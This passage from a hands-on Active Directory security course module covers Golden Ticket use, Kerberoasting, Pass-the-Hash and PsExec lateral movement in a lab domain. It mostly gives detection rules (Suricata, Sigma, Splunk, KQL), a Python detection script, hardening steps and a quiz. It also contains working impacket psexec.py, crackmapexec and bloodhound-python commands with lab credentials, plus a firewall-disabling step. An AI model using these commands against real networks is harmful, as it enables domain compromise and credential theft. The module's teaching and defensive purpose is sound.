psexec.py apophis.local/fakeadmin@DC01.apophis.local -k -no-pass -target-ip 10.10.4.100 -dc-ip 10.10.4.100
# Parameters:
# -k = Use Kerberos authentication with the ticket in KRB5CCNAME (the golden ticket)
# -no-pass = Don't prompt for password
# Expected Output:
# [*] Requesting shares on DC01.apophis.local.....
# [*] Found writable share ADMIN$
# C:\Windows\system32> whoami
# nt authority\system   (psexec runs its service as SYSTEM; the forged identity shows up in DC01's 4624 logon event as APOPHIS\fakeadmin)
# LIST DOMAIN CONTROLLER C:\ DRIVE
smbclient.py -k -no-pass apophis.local/fakeadmin@DC01.apophis.local
# Expected: Access to C$ share with full admin rights
```
**Defensive Countermeasure:**
```powershell
# ON DOMAIN CONTROLLER (as recovery action)
# RESET KRBTGT PASSWORD (do this TWICE, 24 hours apart)
# First reset invalidates current golden tickets
# Second reset (after replication) fully removes old hash
# Use Microsoft script: https://github.com/microsoft/New-KrbtgtKeys.ps1
.\New-KrbtgtKeys.ps1 -WhatIf
# Review changes, then run without -WhatIf
# MONITOR FOR GOLDEN TICKET USAGE
# Event ID 4769 (TGS request) and 4624 (logon) on DC01 and members where:
# - Account name does not exist in AD (a forged principal such as fakeadmin; against patched DCs the forger must use a real name, so rely on the next two)
# - Ticket encryption type 0x17 (RC4) while the domain otherwise issues AES (0x12)
# - A TGS request (4769) for an account with no preceding TGT request (4768) on any DC in the same period
# 4769 does not record ticket lifetime; an abnormal lifetime is only visible in the ticket itself (klist on the host)
```
---
## DEFENSIVE DETECTION & BLUE TEAM RESPONSE
### Detection Rules for Kerberoasting
**Event ID 4769 (Kerberos Service Ticket Request):**
```
ANOMALOUS INDICATORS:
- Ticket encryption type: 0x17 (RC4-HMAC) instead of 0x12 (AES256)
- Ticket options: 0x40810000 (forwardable, renewable, canonicalize)
- Service name: NOT krbtgt/* (indicates service ticket, not TGT)
- Frequency: Multiple SPN requests from single source in short time
SURICATA RULE (content match on the Kerberos pvno=5 field, which AS-REQ and TGS-REQ share, so this is a coarse rate indicator; with Suricata's krb5 app-layer parser, krb5_msg_type:12 restricts it to TGS-REQ):
alert tcp any any -> any 88 (msg:"Possible Kerberoasting - Multiple TGS-REQ"; \
    flow:established,to_server; content:"|a0 03 02 01 05|"; \
    threshold:type threshold, track by_src, count 5, seconds 60; \
    sid:5000001; rev:1;)
SECURITY ONION (Kibana KQL is a filter language with no "| stats"; apply the filter, then group by source.ip and TargetUserName in Hunt or a visualization and alert on more than 5 per minute):
event.code: 4769 AND winlog.event_data.TicketEncryptionType: "0x17" AND NOT winlog.event_data.ServiceName: krbtgt*
```
### Detection Rules for Pass-the-Hash
**Event ID 4624 (Logon) with Type 3 (Network Logon):**
```
SUSPICIOUS INDICATORS:
- Logon Type: 3 (network)
- Authentication Package: NTLM (domain-joined hosts normally use Kerberos; NTLM means the client used an IP address, is not domain-joined, or is a pass-the-hash tool)
- Elevated Token: Yes
- Source IP: not a domain controller and not a known legacy NTLM source
- Local PtH with mimikatz sekurlsa::pth shows instead as Logon Type 9, Logon Process "seclogo", Authentication Package "Negotiate"
SPLUNK QUERY:
index=windows EventCode=4624 Logon_Type=3 Authentication_Package=NTLM Elevated_Token=Yes
| where Source_Network_Address!="10.10.4.100"
| stats count by Account_Name, Source_Network_Address
SIGMA RULE:
title: Pass-the-Hash Activity Detected
status: experimental
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4624
        LogonType: 3
        AuthenticationPackageName: 'NTLM'
    condition: selection
fields:
    - TargetUserName
    - IpAddress
falsepositives:
    - Legitimate NTLM authentication (legacy applications, IP-addressed shares, non-domain-joined hosts); baseline and exclude known sources before alerting
level: medium
```
### Detection Rules for Lateral Movement
**Event ID 7045 (Service Installation) - PsExec:**
```
INDICATORS:
- Service name: Sysinternals PsExec installs PSEXESVC; impacket psexec.py uses a random 4-letter service name and drops a random 8-letter .exe directly under C:\Windows
- Service file path: \\Windows\\[random].exe
- Started by: Network logon (Event 4624 Type 3 precedes)
KQL QUERY:
event.code: 7045 AND
winlog.event_data.ServiceFileName: *\\Windows\\*.exe AND
NOT winlog.event_data.ServiceName: (known_service_list)
```
**Event ID 4688 (Process Creation) - WMI Execution:**
```
INDICATORS:
- Parent process: C:\Windows\System32\wbem\WmiPrvSE.exe
- Child process: Suspicious (cmd.exe, powershell.exe, unusual binaries)
- Command line: Contains encoded commands or download cradles
KQL QUERY:
event.code: 4688 AND
process.parent.name: "WmiPrvSE.exe" AND
process.name: ("cmd.exe" OR "powershell.exe" OR "wscript.exe")
```
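The three rules above run over sample events, as an added example that is not part of the module: a sliding 60-second window per source for RC4 service-ticket requests (Kerberoasting), NTLM network logons from non-DC sources (Pass-the-Hash), and 7045 service installs whose image path matches the PsExec pattern. The events are constructed, not real logs, and the field names are shortened; map them to `winlog.event_data.*` or the Splunk field names in a real pipeline.

```python
"""Detection logic for the module's three rules over constructed sample events."""
import re
from collections import defaultdict, deque
from datetime import datetime

DC_IPS = {"10.10.4.100"}
# impacket psexec.py drops an 8-letter random .exe directly under %SystemRoot%; Sysinternals PsExec installs PSEXESVC
PSEXEC_PATH = re.compile(r"^[A-Za-z]:\\Windows\\[A-Za-z]{4,8}\.exe$", re.IGNORECASE)

EVENTS = [  # constructed sample data
    {"ts": "2024-01-15T10:00:01", "code": 4769, "src": "10.10.2.50", "user": "jsmith", "service": "MSSQLSvc/sqlserver.apophis.local:1433", "etype": "0x17"},
    {"ts": "2024-01-15T10:00:02", "code": 4769, "src": "10.10.2.50", "user": "jsmith", "service": "HTTP/web.apophis.local", "etype": "0x17"},
    {"ts": "2024-01-15T10:00:03", "code": 4769, "src": "10.10.2.50", "user": "jsmith", "service": "CIFS/fs01.apophis.local", "etype": "0x17"},
    {"ts": "2024-01-15T10:00:04", "code": 4769, "src": "10.10.2.50", "user": "jsmith", "service": "LDAP/dc01.apophis.local", "etype": "0x17"},
    {"ts": "2024-01-15T10:00:05", "code": 4769, "src": "10.10.2.50", "user": "jsmith", "service": "HOST/client01.apophis.local", "etype": "0x17"},
    {"ts": "2024-01-15T10:03:00", "code": 4769, "src": "10.10.4.110", "user": "jdoe", "service": "krbtgt/APOPHIS.LOCAL", "etype": "0x12"},
    {"ts": "2024-01-15T10:03:01", "code": 4769, "src": "10.10.4.110", "user": "jdoe", "service": "CIFS/dc01.apophis.local", "etype": "0x12"},
    {"ts": "2024-01-15T10:05:00", "code": 4624, "src": "10.10.2.50", "user": "Administrator", "logon_type": 3, "auth_pkg": "NTLM"},
    {"ts": "2024-01-15T10:05:01", "code": 4624, "src": "10.10.4.110", "user": "jdoe", "logon_type": 3, "auth_pkg": "Kerberos"},
    {"ts": "2024-01-15T10:05:02", "code": 7045, "host": "CLIENT01", "service_name": "qkRZ", "image_path": "C:\\Windows\\KoBqMfXz.exe"},
    {"ts": "2024-01-15T10:05:03", "code": 7045, "host": "CLIENT01", "service_name": "Sense",
     "image_path": "C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe"},
]


def kerberoast_sources(events, count=5, window_s=60):
    """Sources that requested >= count RC4 (0x17) tickets for non-krbtgt SPNs within window_s seconds."""
    recent, hits = defaultdict(deque), set()
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["code"] != 4769 or e["etype"] != "0x17" or e["service"].lower().startswith("krbtgt/"):
            continue
        t = datetime.fromisoformat(e["ts"]).timestamp()
        q = recent[e["src"]]
        q.append(t)
        while q and t - q[0] > window_s:  # drop requests that fell out of the window
            q.popleft()
        if len(q) >= count:
            hits.add(e["src"])
    return hits


def ntlm_network_logons(events, dc_ips=DC_IPS):
    """4624 / type 3 / NTLM from any source that is not a domain controller: candidate Pass-the-Hash."""
    return [(e["user"], e["src"]) for e in events
            if e["code"] == 4624 and e["logon_type"] == 3 and e["auth_pkg"] == "NTLM" and e["src"] not in dc_ips]


def psexec_like_services(events):
    """7045 installs named PSEXESVC or whose binary sits directly under C:\\Windows with a short random name."""
    return [(e["host"], e["service_name"]) for e in events
            if e["code"] == 7045 and (e["service_name"].upper() == "PSEXESVC" or PSEXEC_PATH.match(e["image_path"]))]


if __name__ == "__main__":
    print("kerberoasting from:", kerberoast_sources(EVENTS))
    print("ntlm network logons:", ntlm_network_logons(EVENTS))
    print("psexec-like services:", psexec_like_services(EVENTS))
```

The Kerberoasting rule is the one most worth tuning: a single host requesting five RC4 tickets in a minute is rare once the domain prefers AES, but if RC4 is still the default everywhere, switch the rule to count distinct SPNs per source, since normal clients request one ticket per service they actually use.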
### Defensive Hardening Recommendations
```powershell
# DISABLE NTLM AUTHENTICATION (force Kerberos only)
# Group Policy: Computer Configuration > Windows Settings > Security Settings
# > Local Policies > Security Options
# Network security: Restrict NTLM: Incoming NTLM traffic = Deny all accounts
# ENABLE LAPS (LOCAL ADMIN PASSWORD SOLUTION)
# Randomizes the local admin password per machine so one dumped local hash cannot be reused host to host
# Windows LAPS is built into Windows 10/11 and Server 2019+ since the April 2023 updates; the legacy download is for older builds:
# https://www.microsoft.com/en-us/download/details.aspx?id=46899
# IMPLEMENT PROTECTED USERS GROUP
# Membership blocks NTLM, RC4 and delegation for the account when it authenticates; intended for human admin accounts
Add-ADGroupMember -Identity "Protected Users" -Members Administrator,badmin
# Protected Users does NOT stop Kerberoasting of a service account (the service ticket is still encrypted under its key);
# for svc_sql use a group Managed Service Account (auto-rotated 120-character password) or at least a long random password with AES-only encryption types
# ENABLE CREDENTIAL GUARD (Windows 10/Server 2016+)
# Protects LSASS from memory dumping attacks
# Group Policy: Computer Configuration > Administrative Templates
# > System > Device Guard > Turn On Virtualization Based Security
# MONITOR PRIVILEGED GROUP CHANGES
# Alert on Event ID 4728, 4732, 4756 (user added to security-enabled group)
# IMPLEMENT TIERED ADMINISTRATION MODEL
# Tier 0: Domain Controllers, Domain Admins (separate credentials)
# Tier 1: Servers (different admin accounts)
# Tier 2: Workstations (standard users)
# Prevents compromise cascade
```
---
## MITRE ATT&CK FRAMEWORK MAPPING
| Technique ID | Technique Name | Lab Coverage |
|--------------|----------------|--------------|
| **T1558.003** | Kerberoasting | LAB 5.2 (GetUserSPNs, Hashcat) |
| **T1550.002** | Pass-the-Hash | LAB 5.3 (Secretsdump, PsExec -hashes) |
| **T1021.002** | SMB/Windows Admin Shares | LAB 5.4 (PsExec, SMBExec) |
| **T1021.006** | Windows Remote Management | LAB 5.4 (Evil-WinRM) |
| **T1047** | Windows Management Instrumentation | LAB 5.4 (WMIExec) |
| **T1087.002** | Domain Account Discovery | LAB 5.5 (BloodHound enumeration) |
| **T1069.002** | Domain Groups Discovery | LAB 5.5 (BloodHound group mapping) |
| **T1482** | Domain Trust Discovery | LAB 5.5 (BloodHound trust analysis) |
| **T1558.001** | Golden Ticket | LAB 5.6 (Ticketer.py, KRBTGT extraction) |
| **T1003.006** | OS Credential Dumping: DCSync | LAB 5.3, 5.6 (secretsdump.py against DC01) |
**Kill Chain Phase:** Lateral Movement (Stage 4), Privilege Escalation (Stage 3)
---
## TROUBLESHOOTING GUIDE
### Issue: GetUserSPNs fails with "KRB_AP_ERR_SKEW"
**Root Cause:** Clock skew between Kali Linux and Domain Controller (Kerberos requires <5 min difference)
**Solution:**
```bash
# SYNC TIME WITH DOMAIN CONTROLLER (Kerberos tolerates 5 minutes of skew by default)
sudo ntpdate 10.10.4.100
# Or, with Samba's net tool: sudo net time set -S 10.10.4.100
# (timedatectl set-ntp true points at public NTP pools, which an isolated lab VLAN cannot reach)
# VERIFY TIME SYNC
date
# Compare to DC time
```
### Issue: Secretsdump returns "STATUS_LOGON_FAILURE"
**Root Cause:** Incorrect credentials or account locked
**Solution:**
```bash
# VERIFY CREDENTIALS WITH CRACKMAPEXEC
crackmapexec smb 10.10.4.100 -u svc_sql -p Password123 -d apophis.local
# CHECK ACCOUNT STATUS ON DOMAIN CONTROLLER (PowerShell on DC01; LockedOut and PasswordExpired are not default properties, so request them)
Get-ADUser -Identity svc_sql -Properties LockedOut,PasswordExpired | Select-Object Enabled, LockedOut, PasswordExpired
```
### Issue: BloodHound shows no data after import
**Root Cause:** JSON files empty or collection failed
**Solution:**
```bash
# RE-RUN COLLECTION WITH VERBOSE OUTPUT
bloodhound-python -u jsmith -p Welcome1 -d apophis.local -ns 10.10.4.100 -c All --zip -v
# --zip = Bundle the JSON files into a single ZIP (upload the ZIP as-is)
# -v = Verbose output for debugging
# VERIFY FILE SIZES
ls -lh *.zip *.json
# Should have KB-MB of data, not 0 bytes
# Also confirm GUI and collector are the same generation (legacy 4.x vs CE); a mismatch imports silently with zero nodes
```
### Issue: PsExec hangs at "Requesting shares"
**Root Cause:** Firewall blocking SMB (port 445) or ADMIN$ share not accessible
**Solution:**
```bash
# TEST SMB CONNECTIVITY
smbclient -L //10.10.4.110 -U 'APOPHIS\Administrator%P@ssw0rd!'   # quoted: "!" would trigger bash history expansion
# Should show ADMIN$, C$, IPC$ shares
# CHECK WINDOWS FIREWALL ON TARGET (from compromised shell)
Get-NetFirewallProfile | Select-Object Name, Enabled
# If enabled, disable for lab: Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
```
---
## PROFESSOR'S GUIDANCE
### Why Active Directory is the "Crown Jewel"
**Lessons from Real Breaches:**
- Stolen credentials are consistently among the top initial-access vectors in the annual Verizon DBIR, and the human element (phishing, credential misuse) is involved in the large majority of breaches
- A Kerberoasted hash for a dictionary-word password falls in minutes on one GPU; only long random passwords (or gMSAs) push the cost out of reach
- Service accounts with SPNs and weak, never-rotated passwords turn up in most assessed domains
- KRBTGT is rarely rotated on a schedule, so a stolen KRBTGT hash keeps working until someone resets it (twice)
**Real-World Attacker Workflow:**
1. Phishing email → User clicks → Download payload
2. Payload beacons to C2 server → Attacker gains foothold
3. Run Mimikatz/SharpHound → Extract credentials, map domain
4. Kerberoast service accounts → Crack offline → Obtain Domain Admin
5. Lateral movement → Access file servers, databases → Exfiltrate data
6. Deploy ransomware → Domain-wide encryption
**Defense-in-Depth Strategy:**
- **Prevent:** Strong passwords (15+ chars), LAPS, Credential Guard
- **Detect:** Log Event IDs 4768/4769/4624/4688, monitor NTLM usage
- **Respond:** Isolate compromised accounts, reset KRBTGT (twice), forensic analysis
### Common Student Mistakes
**1. Using Domain Admin for everything:**
- In real enterprise, you'd use least-privilege service accounts
- Lab uses DA for simplicity, but document "in production, use delegated access"
**2. Not capturing network traffic:**
- Run Wireshark during Kerberoasting to see TGS-REQ/TGS-REP exchange
- Blue team needs to recognize these patterns in PCAP analysis
**3. Forgetting to reset KRBTGT after Golden Ticket lab:**
- Golden tickets persist even if you "fix" everything else
- Must reset KRBTGT password TWICE (24 hours apart) to fully remediate
**4. Over-relying on tools without understanding:**
- BloodHound is NOT magic—it visualizes AD relationships you could query manually
- Practice writing custom LDAP queries (ldapsearch, PowerShell Get-ADUser)
### Time Investment
- AD deployment: 2-3 hours
- Kerberoasting lab: 1-2 hours
- Pass-the-Hash lab: 1-2 hours
- Lateral movement: 1-2 hours
- BloodHound enumeration: 2-3 hours
- Golden Ticket attack: 1-2 hours
- Detection rules: 2-3 hours
**Total: 10-18 hours**
### Real-World Skills Developed
By mastering this module, you can:
- Perform AD penetration testing for Red Team engagements
- Identify identity-based attack vectors in enterprise environments
- Implement detection rules for credential theft (SOC analyst role)
- Architect secure AD environments (prevent Kerberoasting, PtH)
- Understand attacker tradecraft (MITRE ATT&CK Lateral Movement tactics)
---
## KNOWLEDGE CHECK
Before proceeding to MOD6, you should be able to:
1. **What makes an account Kerberoastable?**
- Answer: Account must have Service Principal Name (SPN) registered
2. **Why is Kerberoasting attractive to attackers?**
- Answer: Offline cracking (no account lockout), any domain user can request tickets, targets weak passwords
3. **What is the difference between Pass-the-Hash and Pass-the-Ticket?**
- Answer: PtH uses NTLM hash for authentication, PtT uses Kerberos ticket (TGT or service ticket)
4. **How does PsExec achieve code execution?**
- Answer: Copies executable to ADMIN$ share, creates Windows service, starts service, returns output via named pipes
5. **What is the BloodHound query to find Kerberoastable accounts?**
- Answer: Analysis > "List all Kerberoastable Accounts" or Cypher: `MATCH (u:User {hasspn: true}) RETURN u`
6. **Why are Golden Tickets called "golden"?**
- Answer: A forged TGT signed with the KRBTGT key lets the holder act as any identity against any resource, with whatever lifetime the forger sets (tools default to 10 years), and it survives user password resets because only the KRBTGT key matters
7. **What Windows Event ID indicates Kerberos service ticket request?**
- Answer: Event ID 4769 (TGS-REQ)
8. **How do you fully remediate Golden Ticket attack?**
- Answer: Reset KRBTGT password TWICE (24 hours apart) to invalidate all forged tickets
---
## DELIVERABLES CHECKLIST
Before proceeding to Module 6, submit/complete:
- [ ] Windows Server 2022 Domain Controller configured (apophis.local)
- [ ] Windows 10 endpoint joined to domain
- [ ] Service account (svc_sql) with SPN created
- [ ] Kerberoasting output showing cracked password
- [ ] Secretsdump output with NTLM hashes extracted
- [ ] PsExec screenshot showing SYSTEM shell on remote target
- [ ] CrackMapExec output showing "Pwn3d!" with Pass-the-Hash
- [ ] BloodHound JSON files and attack path visualization screenshot
- [ ] Golden Ticket creation and usage demonstration
- [ ] Screenshots showing:
- [ ] GetUserSPNs.py enumeration
- [ ] Hashcat cracking Kerberos ticket
- [ ] Secretsdump dumping DC hashes
- [ ] PsExec shell with whoami output
- [ ] BloodHound shortest path to Domain Admins
- [ ] CrackMapExec lateral movement to multiple hosts
- [ ] Event Viewer showing Event ID 4769 (Kerberoasting detection)
---
**END OF MODULE 5**
**Next Steps:**
1. Take snapshot of all VMs: "Post-MOD5-AD-Compromise"
2. Document all extracted credentials in password spreadsheet
3. Practice writing detection rules for each attack technique
4. Proceed to **MOD6: Incident Response & Digital Forensics**
**Remember:** Every credential you steal as Red Team becomes forensic evidence for Blue Team. In MOD6, you'll investigate these attacks from the defender's perspective!